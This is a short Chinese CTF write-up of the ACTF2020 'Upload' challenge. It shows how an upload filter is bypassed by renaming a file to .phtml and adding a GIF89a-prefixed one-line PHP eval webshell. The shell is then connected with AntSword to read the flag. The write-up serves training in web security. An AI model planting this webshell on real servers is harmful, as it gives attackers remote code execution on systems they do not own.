0%

ACTF2020 新生赛 Upload

同样是一道上传题,上传已有木马

image-20211202162637320

换gif木马重新尝试

image-20211202162755354

上传成功,打开指定网址查看是否有上传文件

image-20211202162849704

果然有

image-20211202162906119

接着打开蚁剑连接,发现

上传的图片中的代码不能用

换方法

随便上传一个图片,然后修改其后缀和内容

image-20211202173541721

改为php后,不通过,则改为phtml

并插入代码

1
GIF89a? <script language="php">eval($_REQUEST[1])</script>

如图

image-20211202173720354

提交后

image-20211202173743862

进入蚁剑连接

image-20211202173834016

在根目录下得到flag

image-20211202173912850